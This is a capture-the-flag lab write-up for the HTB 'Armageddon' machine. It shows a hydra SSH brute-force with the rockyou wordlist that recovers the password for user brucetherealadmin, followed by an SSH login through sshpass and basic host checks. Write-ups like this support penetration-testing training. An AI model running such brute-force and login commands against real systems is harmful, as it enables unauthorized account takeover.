InfoSec LAB

Armageddon_Lateral_Movement

Created: 2 min read

Brute-force Attack

There appears to be a single system user; brucetherealadmin While continuing the other enumeration, I will get hydra going for the brucetherealadmin user

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ hydra -l brucetherealadmin -p /usr/share/wordlists/rockyou.txt ssh://$IP
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 20:44:38
[warning] many ssh configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[data] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[data] attacking ssh://10.10.10.233:22/
[status] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 10.10.10.233   login: brucetherealadmin   password: booboo

I was able to brute-force the password for the brucetherealadmin user against the target SSH service

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ sshpass -p booboo ssh brucetherealadmin@$IP
last failed login: Mon Apr  3 19:46:20 BST 2023 from 10.10.14.2 on ssh:notty
There were 259 failed login attempts since the last successful login.
last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ whoami
brucetherealadmin
[brucetherealadmin@armageddon ~]$ hostname
armageddon.htb
[brucetherealadmin@armageddon ~]$ ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.233  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::7648:5ea1:5371:b3b5  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::69d1:bb00:780c:f997  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:77:2d  txqueuelen 1000  (Ethernet)
        RX packets 825407  bytes 140654223 (134.1 MiB)
        RX errors 0  dropped 24  overruns 0  frame 0
        TX packets 819341  bytes 302343349 (288.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1448  bytes 146156 (142.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1448  bytes 146156 (142.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

This is very much unlikely in the real world application. But here I am. Lateral Movement made to the brucetherealadmin user

Interactive Graph View

Backlinks